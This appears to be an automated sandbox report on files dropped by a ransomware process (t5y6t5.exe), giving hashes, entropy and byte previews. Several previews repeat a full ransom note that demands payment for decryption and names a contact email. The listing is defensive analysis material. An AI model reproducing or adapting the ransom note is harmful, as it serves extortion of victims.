                                                                                            Preview:v.W.Q..Z....z:.3..$..!u...,.I..N..-..}...3...6.z].S..){/t2.R.c.B.....f..A..4.t]2n.,.l...}...............T@Y..)..>h..\......./......}.lK...x...&Wbx.....$......zI...2.7...b.......pN.....}....b..q...!O..d*^......?..F@< ...ap.JO6..eKv.2.,..y]..3.[....Fc%F..K.H..G.....>...... ~.|Dp.1^[.......(.S.s...i\.;..sg..w.j....&d..9..#.4:.......`s/.W.h...l.r.m8Q..]............z ...J."<C.....$.?.)4.U.V.m.|!.Yt....W.}y.^6j..d....D8.T..5n..).Ew..C...M?<.&...$n2Z]).....^9...:yH..'..b.C.5.bW-.1.q....j.o..DE.4]R...~..v....v....@.&._...V......c.a.9&.C..H.<..=_.`..h....N.F...QH.dO.....;..*..U....qC.,...5...Y$...........e.......~.a...E......a#..vM\..f..W...]LMmg.....J..2..0..h.....&Pc.K?...~.5x ......%....[..{..I.M&.z.:E..PqD*..<3....[.k|....n...<.j.IxG'.L.?..t.V......Q..6.m.`[x.d...d......c.....gB..A....dL.lk-.w..?.y..?)i.x.;..z....|.. ...[@&wc..b.:*8.]W.'..'K..y..M..x......(..~d,`...G.kv[....7..j5g..dTWm+...#._$.).^..C.B...q.:..~!=..$_La...|...jX.W.K.'..\......
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:DOS executable (COM)
                                                                                            Category:dropped
                                                                                            Size (bytes):302
                                                                                            Entropy (8bit):7.381757750855859
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Eh6y/arzavopcrWddWNPE9Bzfd37jl6cFILNR1kpkOuh3C3rBf8nPFVGQIESn:6/YzIix+dE9Z9jgcAkpkO8C3tf2VGYSn
                                                                                            MD5:CC249C3D043712A41E5857D8FC6C559C
                                                                                            SHA1:47DD57687FFEDB1C771C32FFB44853C4F05BCD07
                                                                                            SHA-256:B0FE50CDBD0B9E6972319337AB94A22184FC21D2F3D6CC6242EA6891146F3C2C
                                                                                            SHA-512:4877E67985213D7FA49BD8B351F640E71A2C69ACF2854BDF4328EBB88AAFB506B683E1597E00FEA1E140248527F7F7F5DA9C5790061682A37254346854829529
                                                                                            Malicious:true
                                                                                            Preview:.Z-|..d`3....>B...........1....ome............HztL.h_..jtY..:.........L0.*a\.....)9=.D..?e..o+.G......a..z=.o.."..K:.\6@#].........y..;..._.6....m..I...UNbRh.v.,...x.I6.......d.<...O.$G.......,.l....W%....;.(F..;...U...f"]P'!B.=.x.r3Y..Q.....]_y.f.A/.....w..7vV...p.'{...).....0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):49418
                                                                                            Entropy (8bit):1.154334800299077
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:8pjk9N5Vg64XxzqAhh1H0iMs2IXt0rx07mYG2lwuHKweK:8pjk9Njglh1U3sDXGrxfYRwCKweK
                                                                                            MD5:1F3AD920A55F5E98231DFD4D4EF6F922
                                                                                            SHA1:561F8F294DA0E5AE1B2650361A6281285BDD8BD6
                                                                                            SHA-256:BC7FFA6BC1FA4296B739A6A6604DE720FD2EDAD7F6E17D9EA93EC3F113D9C092
                                                                                            SHA-512:92A60F777D9ED39000FBDF12979B3886ED09556ECEA278B1C8F833983913DD1E25D34C8FFEFDA4ABBCE1A8C5882A008654BBC6DE50BE66E61C5E29C357A61A90
                                                                                            Malicious:true
                                                                                            Preview:...g.@f.b.C..'.:.o.....tQJ[.G.f....G...Jh.juX....9>.h.}r.r...$..=...`%..........GQ.%H...UAU........U.SX..B.-...3:.f...n.2.o.b\G....Z..).......?...J..R}q6..B.....|..c..4.Cb...1.k.>...clM.....?..h..2.. va..r..4<.-t.w.t.....,z...s|...?....z'r....hox..j...h..9l^...=....U..........P.7<M...uuU......+..XF..B..`"O...{|.`+......'.O...7.o}............r4....A.!....K..K......C.A.....2b...q...!..L.~.....uN..._d...M..............Qe.....Q.......).....|.wkz\.s'*...6.R.0..cjt ......r............&..l........|..]..tl...2.."...n... .8_XJ.j]yV..A...g]0..R....)@.........K.fc...ULZ..........o......g....F.(....2M...t`.o......gB-....M.Y.Z.}..DW....(....\peC...&...ix.%.n../.l..-..YA....wE..1...4......$@.=`FX.... 6..[.C\0Zc.~.....{..mI....A(.%..Zc...7..IV....d.......)7t.@.!4}.<..T....r#....o.4k..U.[......$...."..OU~2......{..X.*@xj.@.>....;.?...~....j........n..HD"....%..............U.B.,1.;.!...o.I.NF....2..$....].C.o4T.C'.;...P..K$3No.IS........b.W..+.}.>.\F.<b.w.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):33034
                                                                                            Entropy (8bit):1.6055407368817904
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:bD0juwOW/PuGTrqQHroMgzRB03e6yD2+7u5rC4Rdy8Flmlu0ib:bIuUOiqsrobPewi+7u5r7y8vmlmb
                                                                                            MD5:3C067223708F11D508B1092D22AA32F5
                                                                                            SHA1:4A4AE0E22C9886A85A18C7704903E29E9F68C24B
                                                                                            SHA-256:08FA9CAB3C8A23D08EA174E8933FCC04C32A326571A4DE073467926F58663EB7
                                                                                            SHA-512:70C040F701FF17026956728476A4429846517AE227CED1BBB49A079E10F58F2CBA7458FE2B5E356C9FCD423F5677F9D4BD56B1EAA9C3B214F73B9BBFBB2627C9
                                                                                            Malicious:true
                                                                                            Preview:K.z.....k..:.<}....?..Nu....{w..O.M...x...K.5..._.....TXCH......*....>.....4Qb....-S...t_.._...c....]V%.GA..3.4!..cc2+...F.c.%K.a.Y...fd...8.%..K..;,...J+3...j.=|...f..fq.m.....M....0x..ct.Z~.....G..Rm5&.96...#Oh'bF....y.....y.o..y+...}.m...I#....OJ..M..i#.....3.(P.....tt.dz..w.L.Y;'M...nn.....V..C^.z.P....*.-..}.Mg..d.-........Z....%..;.W....J...z....yK..._i5...8Z....x.....N\<.2..T.. ....9.~r.zK.........(...`.l?.......:.%.0V...}.%m/.t.Q..E"....Q.....fXz?...'@.... ..L.@.~....c...D..WN.Hg..".t......P~...()%...BFlt6...E.......<........x.yF....M.F.....Y./79.*..X.....s......"?..Yk..<k...'18|....$z..8......oC.pP.........C....Q..z.T.$x.&.V.Q..o$s0.\..5..1q-...%....jM....a..o.TF../.m../....]..P.:I.L*._.Ml....gE..u..3`..O...=H..Mt.J'(.../....l.gr.]....-?.w..GPP.....].922.d8 ..A.....6..R....*.g..%D.....|`u7. D....I....z..>..x{Q^V..h..D..q..b.XQ\..2.t.O1..Rr2A.],..@.*&.K5.L.n.l.....&...d.d...1.:..%..Q.8.UD..H.c...-.e3.=...V.t...1..1.V.......Z
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.192374312563771
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:FK5lftoWgqzz7vKfHjvw8mMxyupB4jJvoc5LLxlApGEML+V0+lRHn:FK7ftolmOcEPQwc5LLjAZMLQ0+lRHn
                                                                                            MD5:E78AB9025BEFAAD4ABBC0DB75247E374
                                                                                            SHA1:354B9192360C6CC42C8C72B18A9655CAF2A435AF
                                                                                            SHA-256:4327660D8D271162440F92ED7CE49BCCA7B5ACBF476DDDC954530A30E5A2A6F4
                                                                                            SHA-512:83BCE989883601724A45FA2CC0004E51E2E2CAEE15773A31F0CBA8973E331CC272DA70096D04CCBA097F320C5686B98E1161044B14EED4AA6D92D54284319806
                                                                                            Malicious:true
                                                                                            Preview:.vdg6{6e.WI.J.&..................Ju.e.\.HV.+*...65....kg../...Vqg....z..\.n ..W.|..@._".QnM....>....o....DK3..zS.+..,.x..e.....k.nCD....('..^-.o...J{.3rS.E./......s._iF.....k.$...i.'n,X...B)..pp..f...o..N.33H...b....@...>..a..F\.$Y.z...=/B<mT.....Yz...../`."..!...0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):49418
                                                                                            Entropy (8bit):1.1769673515909067
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:9txw/Fcv4tbPWWqnN4VS/Xs+eqLUjB/9h8H+wkWbVJAVVkKEDAl:9taCvue+YjeH92PRbUVgU
                                                                                            MD5:B7F9F8AC59E6539AFE94FEA75D828439
                                                                                            SHA1:86D3DFDA348ED3884F09E33032C6899E45189AAB
                                                                                            SHA-256:D0A684EF9BFCE0C30350C5CAD6CDC1ED7192F8A84049016C77C67F885984AA49
                                                                                            SHA-512:D20889BB021FCF75ADB1D1914A982B7B63863778CCCE085EF8E61F3155402790B93F31D8C74FB9E8B8D207C2B088F4E3B80438B85E4B3FB9388EC0FD72789592
                                                                                            Malicious:true
                                                                                            Preview:~G..g.Y....5.../.3...H......l......),O,e#-l.D...V.K..)c.-....J.........Cc.H]}........4.D.z5$.d.{<,O......d.`.I.H.mo..... .PgV=d.F.\..~..5.v....+......:O.ya...+.........G...JT....`=. ...&.'.3.h.@H.i..l(...H..%X5S...b3R...F....F.'.....]X(.C..[ ..U.76..p...#...5.U.-.[...F.h$.....q....]6..R.7...L....v...'...R^...o....pJ@...%..Rs_Lrr."/.j.P.....\.X.....y...ph."K.....-.........9.Kv.kX.}.;n.X...E.T....`..3X?..!9.~.d.".3Y/+......3i7..c...{b..Xz.;.y..[+YP.sum.>.Z,..6..4.."QF..AX.]....n...{..8.B....~T'..SN;...3.Tt........)..f...u.-...<.8D...:./..U$s..0....I.nI..j5$.......$..^:...^J`{..iuT........Ji+.ws'./WP.......C;.{.;.....I..G_.,q.[.C.qhO. R..|....<*.....}..>......,Hw..J._......:...`.POG..\..$..XoS.m...._H..>A^...1.ci..."..v...+F.3...S......]7<I....{z^.uoL._.@0.Ass...\H....X.E...:.CC....L......IN.2u.........:.JZ..%..h.]..r./....ti.h.9.\...2.....a.^...R.._$-S.gM2.x!".....4+....~}...b.8...g.i... {u/.......Jw".j....c4.......d..7..p. \.F.((.;. .K`F..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):33034
                                                                                            Entropy (8bit):1.6088711737805101
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:/GKXXMJE1lUtjzUcds5XoVkb/JI1VutdCKH9zYqX6NNHNT8b8sL/Q0aBCtK7fGXK:uKsKfUVLqXV8Vu/fH9sHNTCjQ0MNEbk5
                                                                                            MD5:323AA5114686C7A93BDD420C0E704434
                                                                                            SHA1:29FC6C0860475EDCE784D79B9577E08D34860DD9
                                                                                            SHA-256:14CF36D2E30311A9C1184B9595A5241978D3C3B6C4E393C9186AB8800CD6ADDB
                                                                                            SHA-512:0D61AC7C49D2B9B88F5DFBBB497C195135DAE4917E4BB4F5351EEA8AB145B4E1B827056C2D3C123AA5A806477654F07BD5ED2D232183D17D6A44FAE16529E143
                                                                                            Malicious:true
                                                                                            Preview:=k..c............T..~..nL..g......q..&.t..h...U....D....2.:*[.> ..t..8........g..7....1.H"..9b.#.cd_;.6..6_)H.......K.x....j.B9..q.../z3O.T.(.T}z.#.R[.~#..7.[.o...VC....@.\..-....1..kp%.u...5i....n..5....6d.<&W).o...O.'....(Bp....{.....@.J?.........X..5.I.1..a..%.}..g.@|.\%.NV..m.d4.....F...h..&.....y10..@..CH8..X<..|A...j...?.6.........nL,uF..`..9..E...S.1.4^.../....+L..y.XV..5..I.$1...fc!.Wop.f.S.[5..o........?d...g.~F.......)....V..[.s.$.+..7........+...f5;.K...@kG...1.E]g...j.^..r.w..Hm....?...8X..>.g\UO...{...l..JCz...V"Y4&.T:...D.9.K...6.u..T.... ..;x.!......o.).#<H.......O...g..E6..c.<..!..=!..q.......]...-.H..L\.."Js.....<..ia.N....a.8...f. ...&.x..OM...|.*E\+.8l.~..IH!y.....4.....8..........-. .D..WL..B.L.nFj..\B .y.y.>...^....P....[9N...........I.Q..+..>..LC#..........a*.?.......@...lx..*..+.u..'/..jC\.%r.p..Z..<.:....q.;....N..y....X0......<.R...pA....$UG...Vv.#.R..S....>...d...&.{.\^........w%.....?=.w./...h...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.262832918576112
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:FMjEPmWtJ33u37Bb1wZfiForXhYhWothNgyuHFSsBdeT+YFOhKFhv3mn:FSAOIfiSDhYhv7NgyuHWRj3mn
                                                                                            MD5:5910C5FAC85DF15F76008EDD7E83A06E
                                                                                            SHA1:EB0C57BA0043C50AE9B08A160E7B1F72C28CE640
                                                                                            SHA-256:0701A9556B7E7C0ABEC65EEE5C5043F97F796AB385BA0816C0E980AD4EA11C79
                                                                                            SHA-512:C6598C41E5D4553AC62B8D53DFB8AE88AA41ACBA0DDF12502E99E1C794F73427A0D478FD68577BC11963DAB88E515A3E6FC889BA3E95B2C19719BD33224FA4F8
                                                                                            Malicious:true
                                                                                            Preview:...5..s.c.}..............e......9.vJ.=.I..!..#2<.w.sL..jF..O_N.M7.P.4.BT.U.D....,...R....#.H...B..+q..U..(.H..\..).QD{.R..FJB..._..]...F.....w&a... .nJM...h.yi.....?.."3.....1..XWx............b......BT}Y...V...>.7Y................pg.;2oqC........`.L.pj...r.%y...t.0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):49418
                                                                                            Entropy (8bit):1.1490689911837875
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:fT9FTy8ag59F/MBog81cVVcn3l93iXFz4YuznRBm8P3m43:fT9Qfg59tMBold8FzenRBHb3
                                                                                            MD5:C2585E2F3D7C69EEBD2CA68D9724DC40
                                                                                            SHA1:9A7B199F50FB2864A8BB63FBE943504145DF4719
                                                                                            SHA-256:AEB20746CF56488877AA0ECE5F280A13978FAB96C15B58F6383F71A93234298B
                                                                                            SHA-512:6AD4274493434BE6D1254D929A6519DBD4698CBB4BCB041C108E6C7606C6FA016302CADA5FC861A8D99A43C2F72FACFEDF14453A8AEC1E6B524D6BEAAEB35326
                                                                                            Malicious:true
                                                                                            Preview:t.Bp...S..\..P33.A5..?....~Htk...#..pNm.<...t.)Q..l..O.oFrb......#.%.*22.z..L.&....1.z.F..s..u.6..j...#........S_..c^...\....D...W.u.......B..IrfF#.o`.Zz..,........\......Q_.?.qw]..?..`SH.8.J>m4L.`q.].bI.|U.X.l-+T.v...ji...T...-.Q.m........RGhb.Fx.>T.[C../]%.y..#.1.~...-.OQ(.1..!..P...QJ$.m .+P&.n...~...2..&..r..Gz.C..#.X{{..{.P..^..S.]z......m..A........3.l..U..~.B.N...Z.Y%..|}.oX-..3.........E}.m;.c.t....t.x^...D....w..H....yQ...$....U.0...lnV...I.'.zTe.B.k..%.]....$|.e.1..{..q.oQi.x.j...l.`..F.ysA.....c...~...^Aw+..E.1..g..?.3.I....?'..I.....'u..q=..J..k!.X..ch.....`.U.w.X....X.|......}...=..9w...._..Z..{H..e...H......`....HhdS. A.3t.Q.K......5.uW......i.(.E.0.V..l..(.1.......c.H.W.0....D)~[n.U.....>m.[....j.1.r.5P..N#8P.....{..b...9_Yf[=.<NH.e..!.y...{..j..u...E#.a.2.K2.....<.......7C....?....c....@#ZeQ.....x.S.....?.eg. G."..C/..(.......3(..fGm;..._{V..^...~..."..{.) .c....C..:...Q.F.A.....Bc-......../.B.M..}e2T..s3..3...+..i<.5X..a=.h
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):33034
                                                                                            Entropy (8bit):1.6072210219782253
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:v2pTbxznIdPLSp58n3Ku46MxmB15r2eYBmPc5cs1xkeB:OpPxznIBM543Ku46D5/YGPs1T
                                                                                            MD5:DB7756C1CDC99F3667424644619FBE5F
                                                                                            SHA1:1BE17B29161F8CD7C248937C5720DB000F49537F
                                                                                            SHA-256:BDB3AC7509ACD6C1E7C58DF2BA44C89A8C04748E608CC03AF8C40AB24E726261
                                                                                            SHA-512:343BAABABE3437931B52E89BD83E5ED2BC568216A4D3516CFB2B62DD31DCDFE1050CD229CDD30371BCF16505BDB813DEC5D00D8DCF64BC1F9252799F2D521AEA
                                                                                            Malicious:true
                                                                                            Preview:..Z............l.NV.ho..J...H7M..\I;...k.....G...f.F..d.;%.....e..'.).M.B..L.....>.h....w..5.W.*.?WO..vh...V.^..".U9....6...|......$....29.o/.j....I....8.....L.,.....F..R.'.....k.. ..a@Y.Z.i......F..T.....'.q..A'.....=.,Y..Z5%|...9vU...8..1#...&.N.<0.n..s..-......3..E-...v......W..\7.8.._.<'.....d..~.R.m.7.W.%3.9...A....[D.o...f.d...r2...t.>....d..W.!..?.x..)...G...S/M.}..S.~...A..F.....M{}... ..W....{....H....Vu.y*o....._..W....E....:P8........[k...Y....J7.*.....?j...k.u....;!...F\.y...gy.%..A.....s:F.2..B....7LU....K.jk[....-..IU.'D......h.wi6.........r...~;.%.^N.N.g..\..\.9....7..L....$![q..6[..J.qZ..!.\{....uM.A$..;...WXi5.1.8....A3.g....1.:fv..........-u....O`.'j`....J[...2E..>..Al....f....1...@b\.W-...<... &.......&U..P.....<..b2.*.>'.5.... `...O....s....ez:..ls..DnK....JlI..^HYb....O..04.T7.H.y..p..0..J...v......>.P.qfa.7...l=..X..%Mf./!....B..!W(.ol#.J...;.._.g.z.Y....[....I..L..M...S..........d......J.....P....>F..Z..QN.a.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.214259105459532
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:gdpvDYCV06K82TLHNTtkDAOEbiwqQzvpn:KvPVq/TKAOGdn
                                                                                            MD5:AFF46E2A7ACAF5E2CA988DF13A5125F2
                                                                                            SHA1:88934A0F47E057BF1691421C634ACC88B2367B8D
                                                                                            SHA-256:B92232570307F1994074177A1C9B2F29B53583179A3664B643D7F3DD5B4CE9A3
                                                                                            SHA-512:582ED0C66BA5635A3580A83BBF5605DA1846F18642E3DE592058E94FFD67CF25E0BC374D1BE7D966632CEF34C72274ED633C84FC95F77867E1B4ABBB5F684E4B
                                                                                            Malicious:true
                                                                                            Preview:^......kR%.w).............w...G.."......YC.=..C..<.k.;.U..E.5..0%u..".Wm.L.n.....Y...4.........x....^.,g..l..%Y.P.l..Mr.....{N7..p.....c.MZ..\......=...i...^$/.c...~...~F...q.c.'..8.d:...T.^..CL3..*..e(Zi...L.h...9s~.u..v..9..::.....N.....pP...$VW.6.f..b+...x.^lop..S....0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):49418
                                                                                            Entropy (8bit):1.1796589066609278
                                                                                            Encrypted:false
